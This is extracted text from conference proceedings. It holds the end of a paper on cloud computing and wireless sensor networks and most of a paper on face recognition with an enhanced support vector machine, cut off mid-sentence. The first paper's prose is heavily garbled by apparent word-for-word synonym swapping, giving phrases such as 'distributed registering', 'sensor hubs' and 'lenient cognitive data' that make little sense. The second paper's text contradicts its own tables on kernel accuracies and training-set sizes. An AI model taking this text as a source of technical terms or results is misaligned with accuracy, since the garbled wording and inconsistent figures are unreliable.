2 Overview of Cloud Computing

Cloud computing is a referent that being used to depict both a stage and kind of
utilization. Distributed registering stages with intensive courses of action, structures
and reconfigured servers that are being changed are the vital factors. Cloud servers
can be virtual machines or physical machines. In contrast to having nearby servers to
handle applications, this is an option. As a consequence, the distributed computing
system’s end clients do not have any idea where the servers actually are. Clouds
computing customarily join other enlisting resources, for instance, accumulating
locale frameworks, arranging apparatus, “firewall” and other “security contraptions”
[4]. In addition, distributed computing depicts applications that are loosened up to be
open over the web. Such cloud applications use massive server crops and incredible
server hosting “web application” [5] and “Data administrations” [6]. Anyone with a
sensible affiliation to the web and a standard procedure can get to cloud apps.

2.1 Features of Cloud Computing

The main features of cloud computing is as follows:


• The Accumulation of Resources: The assets are progressively doled out
according to customers’ interest from a pool of assets [7].
• Resource Abstraction: Resources are covered up to customers. Customers can
just utilize the assets without having information in regards to the area of the
asset from where information will be recovered and where information will be
put away [8].
• On Demand Service: The solicitation of the customers to profit assets can be
satisfied consequently without human communication [9].
• Measuring Services: Disregarding the way that handling resources are pooled and
shared by various clients (for instance, multi-residency), “the Cloud Foundation”
[10] can evaluate each specific purchaser’s use of assets via its metering feature.
• Demanding Elasticity: There is no proper understanding or agreement on the
timespan for utilizing the assets. Customers can utilize the assets at whatever
point they need and can discharge when they finish [11].
• Accessing Network: The customer application can act in different stage with the
assistance of cell phone, PC and PDA utilizing a protected web association [12].

2.2 Services Provided by Cloud Computing

Four services offered by cloud are as follows:


• Platform as a Service (PaaS): PaaS is an enhanced framework that supports the
entire “Business Lifecycle” that grants cloud customers to clearly create cloud
386 M. P. Nath et al.

organizations and applications (for instance SaaS) on the PaaS cloud. The qual-
ification between SaaS and PaaS is therefore that SaaS has simply completed
cloud applications, while PaaS gives a propelled stage that hosts completed cloud
applications similarly to in-progress. This implements PaaS to provide a basis
for change including the programming situation, programming, arrangement, etc.
Google App Engine is one such case of PaaS [9].
• Infrastructure as a Service (IaaS): Cloud buyers directly use IT structures given
in the IaaS cloud (taking care of, storing, frameworks and other focus figuring
resources). In the IaaS cloud, virtualization is used extensively to organize material
assets in a unique way to satisfy rising or diminishing requests for organizations
from cloud buyers. The principal virtualization method is to set up discrete virtual
machines (VMs), disconnected from both the fundamental gear and diverse VMs.
This strategy is not exactly equivalent to the multi-inhabitance model, which
hopes to change the item establishment of the application to such a degree, that
various cases (from different cloud buyers) can chip away at a single application.
One example of an IaaS is EC2 from Amazon [9].
• Software as a Service (SaaS): Cloud buyers release their applications in an
encouraging space that customers of the application can get to by methods for
frameworks from different clients. Examples are Internet browser, “PDA” [2],
and so on. Cloud users have no leverage over the often-used cloud structure that
uses multi-inhabitant system plan, specifically that assorted cloud clients’ appli-
cations to be consolidated in the SaaS cloud in a single keen condition to achieve
economies of scale and viability with respect to speed, protection, openness,
disaster recovery and backing. SaaS models join Google Mail, Google Docs, etc.
• Data as a Service (DaaS): DaaS can be used as an exceptional IaaS grouping.
DaaS allows purchasers to pay for what they really use for the whole database,
instead of the site permit. Despite standard limit interfaces, for instance, RDBMS
and record structures, some DaaS executions fuse table-style considerations that
are expected to scale out to store and recuperate monstrous measures of data. Such
kinds of DaaS include: “Amazon S3,” “Google BigTable,” “Apache Hbase” [3],
etc.

2.3 Types of Cloud

The cloud can be classified into following four types:


(A) Public Cloud: A public cloud as illustrated in Fig. 2 is a concept of cloud
computing implementation, and is open to public use. In this case, the general
population is described either as individual users or as corporations. The public
cloud foundation is claimed by a cloud administration’s merchant associa-
tion. Instances of open cloud are: “Microsoft Windows Azure,” “Google App
Engine,” “Salesforce.com” and “Amazon Web Services” [2, 4].
(B) Private Cloud: A private cloud, as shown in Fig. 3, is a model of distributed
computing sending some association employments. The privately distributed
Cloud Computing Overview of Wireless Sensor Network (WSN) 387

Fig. 2 Public cloud

Fig. 3 Private cloud

computing frameworks are proposed uniquely for use by their representatives.


It is additionally named inside the cloud. Private mists can convey the benefits
of open distributed computing while at the same time permitting the endeavor
to keep up more prominent information and procedure control.
(C) Community Cloud: A cloud deployment model is called a community cloud,
which is implemented for a community. It may be considered to exist some-
where between a private cloud and a public cloud. The community cloud
portrays a mutual foundation that is utilized by and upheld by numerous
organizations. This mutual cloud asset might be used by bunches that have
been covering contemplations, for example, joint consistence prerequisites,
non-serious business necessities [2].
(D) Hybrid Cloud: A hybrid cloud as shown in Fig. 4 is any blend of past three
models of cloud sending. NIST portrays it as a structure containing at least two
mists (private, group or open). The mists are associated together by normalized
innovations thereby permitting versatility of information and applications [4].
388 M. P. Nath et al.

Fig. 4 Hybrid cloud

3 Overview of Wireless Sensor Network

A WSN incorporates spatially scattered free sensors to obligingly screen physical


or natural conditions, for example: temperature, vibration, weight, advancement or
pollution [1]. The improvement of remote sensor systems was driven by defense
applications like the recognition of war zones. They are currently used in a number of
mechanical and regular citizen application territories, including modern procedures
for monitoring and control [3], machine observation [2], condition and living space
observation [5], applications for medical services, home computerization [3] and
traffic control [1]. Each center point in a sensor sorting is routinely equipped with a
radio handset or a variety of remote devices, a small microcontroller, and a battery
is typically an important source. The shape of the center point of the sensor may be
changing from shoebox to buildup grain.

3.1 Protocols for Routing in WSN

WSN routing conventions are generally divided into two classes: “network-based
structure” and “protocol-based service”. System structure-based controlling are
again separated into level-based planning, distinctive leveled based organizing and
region-based coordinating. Conventional operations are again isolated into “Multi-
path based,” “Query based,” “QoS based,” “Coherent based” and “Negotiation based”
[3]. In area-based routing, positions of the sensor hubs are misused to provide infor-
mation on the system. In this kind of coordination, sensor center points are tended to
by strategies for their regions. The partition between neighboring center points can
be evaluated depending on moving towards sign characteristics.
Relative bearing of neighboring center points can be obtained through the sharing
of this information among peers [3]. Of course, the district of focuses might be open
truly by chatting with a satellite, utilizing “GPS (Global Positioning System)” [5].
The instances of area-based directing conventions are: “GAF,” “GEAR,” “GPSR,”
“MFR,” “DIR,” “GEDIR,” “GOAFR,” “SPAN” [5] and so forth. In hierarchical-based
routing, hubs will assume various jobs in the system. An alternate leveled structuring
can be utilized to process and send the data while low objectives and places can be
utilized to play out the recognition in the closeness of the objective. This suggests
making of packs and assigning one-of-kind tasks to gather heads that can hugely add
to all things considering system adaptability, lifetime and cooperativeness adequacy.
Cloud Computing Overview of Wireless Sensor Network (WSN) 389

Various leveled steering is a compelling strategy to cut down imperativeness to use


inside a bundle. Diverse leveled directing is commonly a two-layer planning, where
one layer is utilized to pick bundle heads and the other layer is utilized for orga-
nizing. The instances of various leveled based directing conventions are: “LEACH,”
“PEGASIS,” “TEEN,” “APTEEN,” “MECN,” “SMECN,” “SOP,” “Sensor Aggregate
steering,” “VGA,” “HPAR,” “TTDD” and so forth [3].

4 Application Scenarios of Cloud Computing and WSN

Joining WSNs with the cloud simplifies the on-the-fly sharing and dissecting of
ongoing sensor knowledge. It also gives a favorable role as assistance over the web
to offer sensor information. The words “Software as a Service (SaaS)” [3] and “Sensor
Event as a Service (SEaaS)” [5] are authored to represent how sensor information
and interest opportunities can be accessed separately over the cloud foundation to
the customers. Converging two advances bodes well for huge utilization numbers.
Some uses of sensor arrangement using distributed computation are as follows.

4.1 Health Care

Sensor systems are additionally utilized in human services territory. In some


propelled facility, sensor frameworks are worked to screen lenient cognitive data, to
regulate the prescription association monitor and to screen patients and authorities
and inside a crisis center. In this situation, the information gathered from the patients
is exceptionally touchy and should be maintained appropriately, as the specialists
require gathered information for potential conclusion [2, 4].

4.2 Transport Surveillance

Transport observing framework incorporates fundamental administration frame-


works like traffic signal control, route, programmed number plate acknowledgment,
cost assortment, crisis vehicle notice, dynamic traffic light and so forth [1]. Sensors
are utilized to perceive vehicles and control traffic lights in transport checking struc-
ture. Camcorders have been used to screen high-traffic street sections and to send
recordings to biological administrators in focal areas. At through street convergence,
sensors with an embedded organizing ability can be transmitted to identify and count
vehicle traffic and gage its pace. Sensors need to talk to neighboring hubs in order
to eventually build up a global traffic picture that customers will want to generate
control signals [5].
390 M. P. Nath et al.

4.3 Climate Anticipation

Anticipating climate is the application to predict the air conditioning for a future time
and for a provided area. Climate checking and determining framework normally
incorporate: data assortment, data absorption, numerical climate expectation and
forecast introduction. To detect the accompanying parameters, each climate station
is equipped with sensors, viz., wind speed/bearing, relative stickiness, temperature,
barometric pressure, precipitation, soil dampness, surrounding light (impercepti-
bility) and sky spread. The data gathered from these sensors are tremendous in size
and use of the conventional database. Absorption process is finished in the wake
of collecting the information. The confounded conditions that prescribe how the
environmental situation changes over time (climate figure) expect supercomputers
to tackle them [3].

4.4 Military Usage

In the military, sensor systems are used to “monitor neighboring powers” [1], “battle-
field observation” [3], battle harm appraisal, nuclear, natural and substance assault
recognition, etc. [5]. The information gathered from such applications is of most
noteworthy importance and high-level security requirements that may not be given
for security reasons by using typical web networks. Distributed computing may be
some of the answers toward this problem by providing only military application with
a stable platform that will be used for only defense intent.

5 Conclusion

The sharing of information between sensor nodes via the Internet is a hectic chal-
lenge owing to limited bandwidth, memory and small battery sizes of sensor nodes.
A widely used cloud computing technique can overcome the storage capacity issues.
Some issues pertaining to cloud computing and sensor networking are discussed in
this paper. The specific application-oriented scenarios are important for the devel-
opment of a new protocol in the sensor network. Keeping this in mind, some cloud
computing application of the sensor networks has been discussed.

References

1. Wang, Y., Jin, Q., & Ma, J. (2013). Integration of rangebased and range-free localiza-
tion algorithms in wireless sensor networks for mobile clouds. In Green Computing and
Communications(Greencom.).
Cloud Computing Overview of Wireless Sensor Network (WSN) 391

2. Priyadarshini, S. B. B., & Panigrahi, S. (2016). A distributed approach based on maximal


far-flung scalar premier selection for camera actuation. Lecture Notes in Computer Science,
87–91. https://doi.org/10.1007/978-3-319-28034-9_10.
3. Priyadarshini, S. B. B., Panigrahi, S., & Bagjadab, A. B. (2017). A distributed triangular scalar
cluster premier selection scheme for enhanced event coverage and redundant data minimization
in wireless multimedia sensor networks. Indian Journal of Scientific Research (IJSR), 14,
96–102.
4. Priyadarshini, S. B. B., & Panigrahi, S. (2017). A distributed scalar controller selection
scheme for redundant data elimination in sensor networks. International Journal of Knowledge
Discovery in Bioinformatics, 7, 91–104. https://doi.org/10.4018/IJKDB.2017010107
5. Nath, M. P., Sagnika, S., Das, M., & Pandey, M. (2017). Object recognition using cat swarm
optimization. International Journal of Research and Scientific Innovation (IJRSI), IV (VIIS),
47–51.
6. Nath, M. P., Goyal, K., Prasad, J., & Kallur, B. (2018). Chat Bot—An edge to customer insight.
International Journal of Research and Scientific Innovation (IJRSI), 5(5), 29–32.
7. Nath, M., Muralikrishnan, J., Sundarrajan, K., & Varadarajanna, M. (2018). Continuous
integration, delivery, and deployment: A revolutionary approach in software development.
International Journal of Research and Scientific Innovation (IJRSI), 5, 185–190.
8. Nath, M. P., Pandey, P., Somu, K., & Amalraj, P. (2018). Artificial intelligence and machine
learning: The emerging milestones in software development. International Journal of Research
and Scientific Innovation (IJRSI), 5, 36–44.
9. Nath, M. P., Sridharan, R., Bhargava, A., & Mohammed, T. (2019). Cloud computing: An
overview, benefits, issues and research challenges. International Journal of Research and
Scientific Innovation (IJRSI), 6, 25–35.
10. Nath, M. P., Sagnika, S. (2020). Capabilities of Chatbots and its performance enhancements
in machine learning machine learning and information processing. Advances in Intelligent
Systems and Computing, 1101, 183–192. https://doi.org/10.1007/978-981-15-1884-3_17.
11. Nath, M. P., Priyadarshini, S. B. B., Mishra, D., & Borah, S. (2020). A comprehensive study
of contemporary IoT technologies and varied machine learning (ML) schemes. In Proceeding
of the International Conference on Computing and Communication (IC3 2020) Sikkim, India,
13–14 July 2020 (pp. 623–634). Springer. https://doi.org/10.1007/978-981-15-7394-1_56.
12. Nath, M. P., Priyadarshini, S. B. B., & Mishra, D. (2020) A comprehensive study on security
in IoT and resolving security threats using machine learning (ML). In Proceeding of the 3rd
International Conference on Intelligent Computing and Advances in Communication (ICAC-
2020), Bhubanewar, India, 25–26 November 2020. Springer, In press.
An Enhanced Support Vector Machine
for Face Recognition in Fisher Subspace

Tanvi Jain and Jyotsna Yadav

Abstract With the advances in technology, facial recognition has become a very
popular technology to be used majorly as a security technique. Face recognition using
support vector machine is being used since years but it does not work well with imbal-
anced data and computational time which is more. In this work, an enhanced support
vector machine (ESVM) is utilized for multi-classifying the face images. Fisher space
method is utilized for feature extraction as it is more efficient for dataset consisting
of multiple classes with class separability as a vital attribute while compressing
dimensionality. It concentrates on type of features from face image data that provide
a better demarcation for separation of face images, and then, ESVM-based multi-
classification is utilized for classification purpose. The advantage of ESVM-based
multiclass classification for face images includes flexibility, enhanced computational
time. ESVM-based multiclass classification based on One-vs-One (OVO) and One-
vs-All (OVA) which is utilized for performing experiment on two standard databases
such as Yale and ORL. A number of experiments are also performed varying sub-
dimensions in fisher space with different kernels of proposed ESVM on different
training sets of both databases. A remarkable recognition rate of 100 and 92.5% was
achieved on Yale and ORL database, respectively.

Keywords Enhanced support vector machine (ESVM) · One-vs-one (OVO) ·


One-vs-all (OVA) · Support vector machine (SVM)

1 Introduction

Facial recognition is a procedure to establish a person’s identity just by analysing


one’s facial features [1]. In recent times, face recognition has seen a surge in its popu-
larity due to the ease of usage it brings with itself. As a result, it has quickly replaced
fingerprint authentication and eye iris analysis. We can find facial identification being

T. Jain · J. Yadav (B)


University School of Information, Communication and Technology, Guru Gobind Singh
Indraprastha University, Delhi, India
e-mail: jyotsnayadav@ipu.ac.in

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 393
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_32
394 T. Jain and J. Yadav

extensively used in mobile handsets nowadays [2]. This new and reliable technique is
also making headways in other critical industries including defence, banking, home
security, etc. Due to these attributes, researchers are continuously working towards
making this novel technology more robust and fool proof.
In pattern recognition, face recognition is the most widely researched topic.
It involves one to many comparisons of a probe face image against all gallery
face images. It consists of three steps majorly divided into—pre-processing (face
detection, normalization), feature extraction (dimensionality reduction) and feature
matching (authentication/recognition) [3, 4]. The extracted features are compared
with the input image and the database.
The input for the face recognition system can be a static image or dynamic image
(image captured by video). This work focuses on the static images for face recog-
nition. To achieve this, a combination of fisher subspace technique and enhanced
support vector machine is used. Other approaches proposed previously are by Turk
and Pentland [5], the concept of Eigenfaces was proposed, and this technique
was unsupervised method. Belhumeour et al. recommended fisher faces [6], which
was a supervised technique. The performance of identification improved with this
procedure.
Zhang et al., Maria et al., used Gabor wavelet Transform (GWT), stating this
method which has improved recognition rate, but its memory requirement, compu-
tation and the feature dimensions were very high [7, 8]. For illumination invariant
face recognition, an approach was proposed based on GWT, and then, K-nearest
neighbour was applied for classification [9]. Jyotsna et al. recommended a different
methodology for face recognition using principal component analysis, symlet and
cosine angle distance to improve the recognition rate on AT&T database [10].
The key challenges for positive face detection and recognition systems are illumi-
nation conditions, background, occlusion, pose, expressions, etc. Numerous algo-
rithms and approaches have been put forward to address these issues. For pose
invariant facial recognition, Xi Yin et al. suggested a convolutional neural network-
based methodology [11]. For illumination invariant facial recognition, a normaliza-
tion framework using reflectance ratio and homomorphic filtering was proposed [12].
An approach was proposed for expression invariant face recognition that used PCA,
Gabor filter and support vector machine [13], and also the system could identify
various expressions as angry, sad, etc. For feature extraction under various illumina-
tion conditions, an approach using reflectance ratio and histogram equalization was
proposed [14].
In this work, a variant of support vector machine is developed, named as enhanced
support vector machine (ESVM). With an improvement in computational time,
ESVM outperforms the traditional SVM. For classification, both techniques are used,
one-vs-one and one-vs-all. This work contributes in the following manner:
• Fisher subspace method is used for feature extraction and dimensionality reduc-
tion. The main goal of this technique is to maximize inter-class distance and
minimize distance within the class.
An Enhanced Support Vector Machine for Face Recognition … 395

• ESVM is proposed for classification of input images. This method allows a data
point on the other side of hyper plane than the group in which it falls by adding
an erroneous quantityξ.
• Experimental results are presented on YALE and ORL database, and outstanding
results are achieved, even though no pre-processing technique was applied. Even
better results can be achieved if pre-processing techniques are applied.
This paper is structured as follows: The idea of the proposed methodology is
explained in Sect. 2. Section 3 elaborates on experimental results on Yale and ORL
face image databases to demonstrate the effect of varying sub-dimensions with
varying number of training sets using the proposed methodology. Also, comparison
with existing approaches is shown. The conclusion is conferred in Sect. 5.

2 Proposed Methodology

The proposed approach takes as an input the face database and then divides the
input set into training images and test images as illustrated in Fig. 1. Results are
evaluated by varying sub-dimensions with different kernels on different number of
training sets. Fisher subspace method [15] is used for feature extraction producing
reduced dimensionality data which is fed into next stage, namely classification. For
classification, an enhanced support vector machine (ESVM) is developed, and also
for multiclass classification, two techniques are applied one-vs-one (OVO) and one-
vs-all (OVA). At the last stage of proposed methodology, i.e. model evaluation stage,
recognition accuracy and computational time is calculated for unknown face images.
Using fisher subspace method, the test images are reduced into same dimension as
training image. Then, the reduced image is classified into one of the class labels.

2.1 Fisher Subspace Feature Extraction Method

Fisher subspace method is a dimensionality reduction and feature extraction tech-


nique in the pre-processing step for face recognition just like PCA, but it focuses on

Fig. 1 Proposed methodology


396 T. Jain and J. Yadav

making within-class distance smaller after data sets are projected and makes inter-
class distance larger. This method does not work on finding the principal components;
it basically finds type of features or subspace which gives more discrimination to
separate the data. The goal of fisher subspace method is to project a n-dimension
image onto a smaller subspace s where s ≤ n − 1 [16].
Suppose, there are training face images as {x 1 , x 2 , …, x n } which belong to total
number of C classes, X 1 , X 2 , …, X C . The steps to calculate fisher projections for
images are as follows [17]:
1. Calculate the within-class distance matrix (Sw )

S w calculates the degree of scatter among items in the same class. It is calculated as
the summation of covariance of each class as given in Eq. (3).
Covariance of each class as shown in Eq. (1),

Si = (xn − μi )(xn − μi )T (1)
n ∈Ci

where μi is mean of images in that class as cited in Eq. (2),


 xn
μi = (2)
n ∈C
Ni
i


Sw = Si (3)
n ∈Ci

2. Calculate in-between class distance matrix (Sb )

The degree of scatter (S b ) in different set of classes is calculated as the summation


of covariance of the difference between the total mean and the mean of all images
as given in Eq. (4).


C
Sb = Ni (μ i − m t )(μ i − m t )T (4)
i=1


k
where mt is the global mean of all the images (k), m t = 1
k
xn .
n=1

3. Find the best fisher subspace projection vector

Similar to PCA, eigenvectors having largest eigenvalues are used to calculate this.
Fisher criterion function when w is projection vector as expressed in Eq. (5),
 T 
|Sb | w Sb w 
J (w) = =   (5)
|Sw | w T Sw w 
An Enhanced Support Vector Machine for Face Recognition … 397

The goal is to maximize J(w), and the optimal fisher basis projection matrix can
be obtained as given in Eq. (6),
 T 
w Sb w 
w = arg max  T  (6)
w Sw w 

Above-mentioned equation can be transformed into solving eigenvalue and


eigenvector of equation as expressed in Eq. (7),

Sw−1 Sb w = λw (7)

4. Project images onto fisher projection matrix

All the original images are projected onto fisher basis projection matrix by computing
dot product of image matrices with each of fisher basis projection vector as expressed
in Eq. (8).

y = wT X (8)

where X = input data, y = reduced image.


The reduced training set images and test set images are fed into next phase for
classification.

2.2 Enhanced Support Vector Machine (ESVM)

ESVM stands for enhanced support vector machine [18]. It is a variant of support
vector machine (SVM). The word enhanced signifies the flexibility; it provides to the
otherwise strict SVM. It suggests inclusion of approximate planes (and not strictly
bounding planes) around which the points of each category are grouped as illustrated
in Fig. 2.
It is extremely fast and reduces computational time for large data sets. ESVM
classifies linearly or nonlinearly separable data points by categorizing them to nearest
of two parallel planes which are to be pushed apart as far as possible (by the term
w T w + γ 2 ). SVM does not perform well when the target classes are overlapping. In
such cases, ESVM performs better than SVM. ESVM can solve the given problem
using linear equations as compared to quad programming used in SVM. From the
computational aspect, ESVM is better than SVM as observed in Sect. 3.
Equation of two hyper planes around which the point of each class are clustered
are, c x T w − γ = ±1 and x T w − γ = −1 respectively. If a point in a class which
does not fall on the hyper plane, x T w − γ = −1 and does not satisfy equation, a
quantity ξ is added on left-hand side x T w − γ + ξ = −1. ξ represents eccentricity
398 T. Jain and J. Yadav

Fig. 2 ESVM with error variable

of the data point from the plane passing through that particular class to which that
point belongs.
The learning problem of ESVM is expressed in Eq. (9):

C T 1 T 
min ξ ξ+ w w + γ2 (9)
(w,γ ) 2 2

subject to

D(Aw − eγ ) + ξ = e (10)

where
e is a matrix of 1’s with dimension as (number of data points (m) × 1).
d is a vector of target value.
D = diagonal (d), target value of ith data, it takes +1 or −1 value.
A represents vector of data points in input space.
To enhance the performance of ESVM, any kernel can be applied on data samples,
A matrix. For our experiment purpose, three kernels are used  (i) to  create a linear
classifier using ESVM, a linear kernel function is applied: k x j , xk = x Tj xk , (ii) to
create a nonlinear
 classifierz using ESVM, a polynomial kernel function is applied:
 
k x j , xk = x j xk + 1 , where z is the order of polynomial and (iii) a Gaussian
T
   
function is applied as: k x j , xk = exp −γ x j − xk2 .
H is computed by Eq. (11),

H = D ∗ [A − e] (11)
An Enhanced Support Vector Machine for Face Recognition … 399

Using H matrix, r is solved by Eq. (12),


−1
1
r =1− H + HT H ∗ HT (12)
C

where C is weighting factor.


Lagrangian multiplier (u) is calculated using Eq. (13),

u = C ∗r ∗e (13)

Now, w and γ can easily be computed using Eqs. (14) and (15)

w = AT ∗ D ∗ u (14)

γ = − eT ∗ D ∗ u (15)

For multiclass classification, two types of classification are used, namely OVO and
OVA. The OVA scheme breaks up a multiclass classification into one binary classifi-
cation problem per class, whereas the OVO strategy divides a multiclass classification
into one binary classification problem per each pair of classes.

3 Experimental Results

3.1 Yale Database

To assess the proposed system’s performance, tests were performed on Yale database
which consists of images in GIF format. There were 15 subjects and 11 images
per individual. Size of each image was 152 × 126 pixels. The proposed algorithm
was implemented in MATLAB 2019. Experiments were performed on a machine
with Intel i5 core, 2 GHz CPU and 8 GB RAM. Figure 3(a) shows few sample
images with different expression (such as happy, normal, surprised and sad), pose
and illumination.

3.2 ORL Database

ORL database consists of images of size 112 × 92. Images of total 40 individuals were
there with 10 images per individual in GIF format. These images were captured with
varied facial expressions and changing illumination. The images are a combination
of frontal view with minor left-right rotation (Fig. 3(b)).
400 T. Jain and J. Yadav

Fig. 3 a Illustration of Yale face database for a subject, b illustration of ORL face database for a
subject

Three sets of experiments are performed as follows: (i) during feature extraction,
selection of sub-dimensions for different number of training images, (ii) ESVM is
applied for multiclass classification. OVO and OVA are applied on both the databases
and (iii) different kernels had different effect on the performance of machine learning
algorithms. Tests are performed using linear kernel, polynomial kernel of order 2 and
Gaussian kernel.

3.3 Selection of Number of Sub-Dimensions in Fisher Space

To determine the minimum number of sub-dimensions required that account for most
of the variation in data, tests are performed with varying sub-dimensions on varying
number of training sets as illustrated in Tables 1 and 2 for Yale and ORL database,
respectively. In order to train the model, three images of every subject are chosen, and
the rest 8 images per subject are used for recognition in Yale database. Similarly, for
ORL database, in order to train the model, three images per subject are chosen, and
the rest 7 images per individual are used for recognition. Different sets of training

Table 1 Result on Yale database when proposed ESVM system is applied with varying sub-
dimensions with linear kernel and OVA classification on different training sets
Training Number of sub-dimensions
images per 30 40 50 60
individual
Acc (%) t i (s) Acc t i (s) Acc t i (s) Acc t i (s)
(%) (%) (%)
4 83.81 0.177 88.57 0.193 85.71 0.18 82.86 0.172
5 80 0.206 87.78 0.17 86.67 0.179 84.44 0.17
6 89.33 0.181 94.67 0.181 96 0.171 96 0.182
7 90 0.316 93.33 0.166 95 0.16 96.67 0.17
8 88.89 0.24 95.56 0.175 95.56 0.192 95.56 0.178
9 96.67 0.176 100 0.171 100 0.172 100 0.174
An Enhanced Support Vector Machine for Face Recognition … 401

Table 2 Result on ORL database when proposed ESVM system is applied with varying sub-
dimensions with linear kernel and OVA classification on different training sets
Training Number of sub-dimensions
images per 30 40 50 60
individual
Acc (%) t i (s) Acc t i (s) Acc t i (s) Acc t i (s)
(%) (%) (%)
4 75.83 0.253 77.92 0.258 80 0.266 81.25 0.273
5 74.5 0.304 79.5 0.288 84.5 0.371 86 0.302
6 78.75 0.348 80.63 0.355 84.38 0.362 85 0.358
7 79.17 0.396 81.67 0.417 86.67 0.407 86.67 0.416
8 81.25 0.463 83.75 0.479 86.25 0.48 87.5 0.496
9 87.5 0.607 92.5 0.531 90 0.584 87.5 0.568

images considered are 4, 5, 6, 7, 8 and 9 per individual, respectively, for both the
databases.
The acceptable level of variance depends on the application. For descriptive
purposes, there can be a requirement of 80% of the variance, whereas to perform anal-
yses of the data, at least 90% of variance may be required. Out of total sub-dimensions,
maximum recognition accuracy (Acc) of 100% was achieved in Yale database at
number of sub-dimensions as 40 and 9 training images per individual. Similarly, in
ORL database also, maximum recognition accuracy of 92.5% was achieved at number
of sub-dimensions as 40. So, number of sub-dimensions considered for following
tests will be 40. Also, this means computational time can be reduced keeping the
same performance of the proposed model. The outcomes are shown in Fig. 4.
As shown in Fig. 5, the computational time of ESVM is very less than SVM.
To compute recognition accuracy using proposed methodology with training images
as 5 and sub-dimension as 40, time taken is 0.17 s, whereas with same dimensions
time taken using SVM is 2.91 s. So, the proposed methodology helps in reduction
of computational time.

Fig. 4 Accuracy of proposed system on a Yale database at number of sub-dimension = 40 and


training images = 9, b ORL database at number of sub-dimension = 40 and training images = 9
402 T. Jain and J. Yadav

Fig. 5 Comparison of time


(s) for ESVM and SVM on
Yale database

3.4 Multiclass Classification: One-Vs-One(OVO),


One-Vs-All(OVA)

After fisher subspace phase using the chosen number of sub-dimension, data set is
passed to ESVM phase where two categories of classifiers are used, namely OVO
and OVA.
First, the results using ESVM and OVO are utilized on Yale database with different
number of training images per subject. To improve the recognition rate in ESVM
system, a linear kernel with OVA classification is recommended. Table 3 showcases
the performance of this method on Yale database when different number of training
images was tested. There was a significant improvement in accuracy in this system,
and also it worked faster. This is illustrated in Fig. 6. The recognition accuracy
with OVO classification was found to be 90% while training with 9 images per
individual, and for similar training images, an accuracy of 100% was achieved with
OVA classification.

Table 3 Result on Yale database when proposed ESVM system is applied with varying training
images with linear kernel and OVO and OVA classification on different training sets
Training set OVA OVO
Acc (%) t i (s) Acc (%) t i (s)
4 80.2 0.17 78.2 0.301
5 80 0.177 73.33 0.307
6 97.33 0.172 94.67 0.214
7 96.67 0.175 78.33 0.204
8 97.78 0.174 86.67 0.198
9 100 0.175 90 0.203
An Enhanced Support Vector Machine for Face Recognition … 403

Fig. 6 Accuracy of proposed system on a Yale and b ORL database by applying OVO and OVA
at different number of training images

Table 4 Result on ORL database when proposed ESVM system was applied with varying training
images with linear kernel and OVO and OVA classification on different training sets
Training set Acc (%) t i (s)
Acc (%) t i (s) Acc (%) t i (s)
4 77.92 0.258 51.25 0.711
5 79.5 0.288 55.5 0.672
6 80.63 0.355 45.63 0.665
7 81.67 0.417 46.67 0.61
8 83.75 0.479 48.75 0.556
9 92.5 0.531 42.5 0.498

The performance of this system on ORL database taking different number of


training image is given in Table 4. There is a significant improvement in accuracy in
this system. This is illustrated in Fig. 6. The recognition accuracy with OVO classi-
fication was found to be 42.5% while training with 5 images per individual, and for
similar training images, an accuracy of 92.5% was achieved with OVA classification.

3.5 Selection of Kernel for ESVM

To further enhance the performance of ESVM, tests were done with different kernels
with varying training images. Kernels are set of mathematical functions used by
any SVM algorithm which transforms data into the preferred form. Various kernel
functions used are linear, nonlinear, polynomial, sigmoid and Gaussian kernel. On
Yale database, a combination of linear kernel with OVA gave maximum results.
Recognition accuracy with polynomial kernel of order 2 with OVA classification
was found to be 85.33%, whereas with Gaussian kernel, it improved to 93.33%,
404 T. Jain and J. Yadav

Table 5 Result on Yale and ORL database when proposed ESVM system was applied with different
kernels and OVA classification on different training sets
Kernels YALE ORL
Acc (%) t i (s) Acc (%) t i (s)
Linear(1) 100% 0.171 92.5 0.545
Polynomial(2) 85.33 0.179 82.5 0.603
Gaussian(3) 93.33 0.209 57.5 0.123

Fig. 7 Accuracy of
proposed system on Yale and
ORL database by applying
different kernels at different
number of training images

and with linear kernel, we attained maximum accuracy rate of 100% with 9 training
images per individual. Also time taken to compute is less in linear kernel as shown
in Table 5.
On ORL database, recognition accuracy with polynomial kernel of order 2 with
OVA classification was found to be 57.5%, whereas with Gaussian kernel, it improved
to 82.5%, and with linear kernel, we attained maximum accuracy rate of 92.5% with
9 training images per individual as shown in Table 5 (Comparison of ORL and Yale
shown in Fig. 7).

4 Comparative Analysis and Discussion

The comparison of proposed methodology on Yale database is performed with tech-


niques as RRHE_RFDWPT, GradF, SVM_KNN, IKLDA_PNN at number of training
sets at 6 and 4 as presented in Table 6. A combination of fisher subspace feature
extraction and enhanced support vector machine is used in proposed system. It outper-
forms above-mentioned techniques as accuracy rate is more. The outcomes on ORL
An Enhanced Support Vector Machine for Face Recognition … 405

Table 6 Proposed methodology comparison with various techniques on Yale database


Approaches Accuracy rate (%)
IKLDA_PNN [20] (No. of training images = 6) 81.56
GradF [21] (No. of training images = 6) 93.4
SVM_KNN [22] (No. of training images = 4) 95.25
RRHE_DWPT [14] (No. of training images = 6) 96.46
Proposed methodology (No. of training images = 6) 97.33

Table 7 Proposed
Approaches Accuracy rate (%)
methodology comparison
with various techniques on PCA_KNN (k = 5) [23] (No. of training 72
ORL database images = 7)
PCA_SVM (poly quad) [24] 72.9
PCA_SVM (poly linear) [24] 76.7
PCA_KNN (k = 3) [23] (No. of training 78
images = 7)
DCT_PCA [25] (No. of training images 91.84
= 6)
Proposed methodology (No. of training 92.5
images = 9)

database are compared with techniques as PCA_KNN (k = 3, 5), PCA_SVM (poly


linear kernel), PCA_SVM (poly quad kernel), DCT_PCA at number of training sets
at 6 and 7 as shown in Table 7. The outcomes on ORL database in terms of recogni-
tion rate are impressive using proposed methodology, and the computational time is
very less compared to traditional SVM as compared in [19].

5 Conclusion

In this paper, a technique for multi-classification of face has been proposed based on
ESVM in fisher subspace. The proposed multi-classifying technique was utilized on
ORL and Yale databases in which an accuracy of 100 and 92.5% was achieved. This
method outperforms traditional SVM as shown in comparison and is computationally
faster than it. A number of experiments were performed on different kernels of
proposed ESVM technique and by varying dimensions to achieve high accuracy.
ESVM works better with linear kernel using OVA classification method and also,
better than other techniques. As future work, we have been applying wavelets in
